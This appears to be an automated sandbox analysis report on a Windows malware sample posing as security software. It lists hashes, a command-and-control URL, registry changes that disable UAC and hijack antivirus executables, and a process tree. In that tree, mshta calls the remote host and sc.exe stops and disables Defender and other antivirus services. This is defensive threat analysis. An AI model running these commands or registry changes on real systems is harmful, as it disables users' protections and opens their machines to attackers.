Analysis
-
max time kernel
150s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
19/06/2024, 20:59
Static task
static1
Behavioral task
behavioral1
Sample
0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Resource
win10v2004-20240508-en
General
-
Target
0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
-
Size
2.0MB
-
MD5
0077c2fd7e98b372a973640ebdb67bb4
-
SHA1
687f3783243b3da71d0cb882318224df3406a11c
-
SHA256
b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1
-
SHA512
5866d2e329e5e7aff9e306af17c9cf7ddf7a4f47eb42f3473470af7ffb57af2c6473c1062f645369f050cb7852017f0d3dfbdabf84064c0508f77a6778d9e9aa
-
SSDEEP
49152:DLqatPmogbmVZBTN1xC05KRkgc68WJI5NeGu5dkpFpERe8JjVwv14x4Q:DbmHb0f1CRNRJuIGu5mpFpERe8s1i
Malware Config
Extracted
http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oxby.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luinit.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPck.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetlnfo.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mscman.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\trickler.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hbsrv.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pctsTray.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atro55en.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atwatch.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp32.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\driverctrl.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixcfg.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setloadorder.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sweepnet.sweepsrv.sys.swnetsup.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atcon.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cv.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jedi.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PskSvc.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashrep.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncinst4.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setupvameeval.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AlphaAV\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgserv9.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfiaudit.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfplogvw.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanpc.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wnt.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msbb.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mwatch.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avshadow.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blss.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\divx.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lordpe.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OAcat.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\poproxy.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexplorerv1.0.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgiproxy.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccevtmgr.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msa.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updat.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wrctrl.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xpdeluxe.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avnt.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaview.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rcsync.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\soap.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loader.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tbscan.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto-protect.nav80try.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dpfsetup.exe\Debugger = "svchost.exe" Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gbn976rl.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iomon98.exe Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows.exe Protector-oxby.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nupgrade.exe\Debugger = "svchost.exe" Protector-oxby.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaui.exe Protector-oxby.exe -
Executes dropped EXE 3 IoCs
pid Process 1996 6884gab1kb8k3p1.exe 2660 l089d0966e530b3.exe 2620 Protector-oxby.exe -
Loads dropped DLL 7 IoCs
pid Process 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 1996 6884gab1kb8k3p1.exe 1996 6884gab1kb8k3p1.exe 2660 l089d0966e530b3.exe 2660 l089d0966e530b3.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-oxby.exe" Protector-oxby.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oxby.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-oxby.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-oxby.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-oxby.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1540 sc.exe 1664 sc.exe 1672 sc.exe 1904 sc.exe 1940 sc.exe 2308 sc.exe 1908 sc.exe 352 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-oxby.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Protector-oxby.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Protector-oxby.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2660 l089d0966e530b3.exe Token: SeShutdownPrivilege 2660 l089d0966e530b3.exe Token: SeDebugPrivilege 2620 Protector-oxby.exe Token: SeShutdownPrivilege 2620 Protector-oxby.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2660 l089d0966e530b3.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe 2620 Protector-oxby.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 840 wrote to memory of 1996 840 0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe 28 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 1996 wrote to memory of 2660 1996 6884gab1kb8k3p1.exe 29 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2620 2660 l089d0966e530b3.exe 30 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2660 wrote to memory of 2392 2660 l089d0966e530b3.exe 31 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 2524 2620 Protector-oxby.exe 33 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1904 2620 Protector-oxby.exe 36 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1940 2620 Protector-oxby.exe 37 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 1908 2620 Protector-oxby.exe 38 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 2308 2620 Protector-oxby.exe 41 PID 2620 wrote to memory of 352 2620 Protector-oxby.exe 42 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-oxby.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-oxby.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe" -e -p7lf02436t7m3i732⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Roaming\Protector-oxby.exeC:\Users\Admin\AppData\Roaming\Protector-oxby.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2620 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=7601&6=6&7=1&8=99600&9=1033&10=0&11=0000&12=hwktraryyo&14=1"5⤵
- Modifies Internet Explorer settings
PID:2524
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
PID:1904
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
PID:2308
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
PID:352
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
PID:1672
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\L089D0~1.EXE" >> NUL4⤵PID:2392
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD51a45a0c072a3a8dbd8a3b8d92894e3f8
SHA11e6db89437e0fd3bcb14c6c9dbe1ce98bb286c20
SHA25643bb6c5aac2f0a5b2597b274c69a0fac1d5d5bd6f62fed8a7b6a203cea3d3325
SHA512689531c4c6091f2124dd4a1750fd4b04fe282d2a61cd51ea5dc936609939f27a3025b0613384bc792c9bd57f64824535fc96ab9eca2e0dd19fb07be13dd16d42
-
Filesize
1.9MB
MD5b5ff5ef86e7f83fe0ea09efa4b2a13a5
SHA1af3ad93fb39011d8f659fa6f4947664063319f59
SHA25694ef4a33bf5a8f36f70612b010eebc80ef605a4ddc4526d8dd1554c5f3030019
SHA5126dfd92e8a86fe13b0850d02551a98ee2a120087180a9263966f7e14b8a54ffa147cbe90da3fb54848a718ad8ca4b3e98dcf1c60eb8d484fdbc62390c95fef9cc